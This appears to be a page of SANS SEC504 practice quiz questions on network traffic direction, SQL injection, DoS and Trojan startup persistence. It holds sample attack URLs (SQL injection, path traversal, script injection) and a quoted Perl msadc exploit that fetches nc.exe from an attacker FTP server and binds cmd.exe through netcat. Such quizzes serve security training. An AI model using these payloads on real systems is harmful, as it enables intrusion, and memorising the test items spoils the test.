SANS SEC504 Quiz 1 Topic 7 Questions 1-5

Question: 1

Which of the following describes network traffic that originates from the inside of a network perimeter and progresses towards the outside?

AIngress network

BInwards network

CEgress network

DOutwards network

Show Answer

Question: 2

Which of the following HTTP requests is the SQL injection attack?

Ahttp://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al

Bhttp://www.victim.com/example?accountnumber=67891&creditamount=999999999

Chttp://www.myserver.com/search.asp?lname=adam%27%3bupdate%20usertable%20set% 20pass wd%3d %27hCx0r%27%3b--%00

Dhttp://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%
2fwww.yourser ver.c0m %2fbadscript.js%22%3e%3c%2fscript%3e

Show Answer

Question: 3

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#####################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host --C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

ACreates a share called 'sasfile' on the target system

BCreates an FTP server with write permissions enabled

COpens up a SMTP server that requires no username or password

DOpens up a telnet listener that requires no username or password

Show Answer

Question: 4

Peter works as a Network Administrator for the PassGuide Inc. The company has a Windows-based network. All client computers run the Windows XP operating system. The employees of the company complain that suddenly all of the client computers have started working slowly. Peter finds that a malicious hacker is attempting to slow down the computers by flooding the network with a large number of requests. Which of the following attacks is being implemented by the malicious hacker?

ASQL injection attack

BDenial-of-Service (DoS) attack

CMan-in-the-middle attack

DBuffer overflow attack

Show Answer

Question: 5

You have inserted a Trojan on your friend's computer and you want to put it in the startup so that whenever the computer reboots the Trojan will start to run on the startup. Which of the following registry entries will you edit to accomplish the task?

AHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Startup

BHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto

CHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

DHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Start

Show Answer

SANS SEC504 Quiz:1 Topic:7 Questions:1-5